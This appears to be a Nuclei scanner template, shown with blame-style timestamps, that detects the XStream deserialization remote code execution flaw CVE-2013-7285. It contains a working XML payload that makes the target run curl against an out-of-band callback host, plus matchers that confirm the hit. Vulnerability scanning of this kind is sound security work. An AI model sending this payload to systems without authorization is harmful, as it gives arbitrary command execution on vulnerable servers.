2023-03-12 03:38:05 +00:00
id : CVE-2013-7285
info :
2023-04-12 17:19:25 +00:00
name : XStream <1.4.6/1.4.10 - Remote Code Execution
2023-05-06 16:36:32 +00:00
author : pwnhxl,vicrack
2023-03-29 20:18:04 +00:00
severity : critical
2023-03-23 11:21:46 +00:00
description : |
2023-04-12 19:45:23 +00:00
Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-03-12 03:38:05 +00:00
reference :
2023-03-29 20:18:04 +00:00
- https://x-stream.github.io/CVE-2013-7285.html
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html
2023-04-12 17:19:25 +00:00
- https://nvd.nist.gov/vuln/detail/cve-2013-7285
2023-05-06 16:36:32 +00:00
- https://blog.csdn.net/Xxy605/article/details/126297121
2023-03-29 20:18:04 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2013-7285
cwe-id : CWE-78
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
epss-score : 0.33561
2023-03-23 11:21:46 +00:00
tags : cve,cve2013,xstream,deserialization,rce,oast
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-03-12 03:38:05 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-12 03:38:05 +00:00
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
2023-05-06 16:36:32 +00:00
<sorted-set>
<string>foo</string>
<contact class='dynamic-proxy'>
<interface>java.lang.Comparable</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>curl</string>
<string>http://{{interactsh-url}}</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
</sorted-set>
2023-03-12 03:38:05 +00:00
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
2023-03-22 09:51:20 +00:00
- "http"
- type : word
part : interactsh_request
words :
2023-05-06 16:36:32 +00:00
- "User-Agent: curl"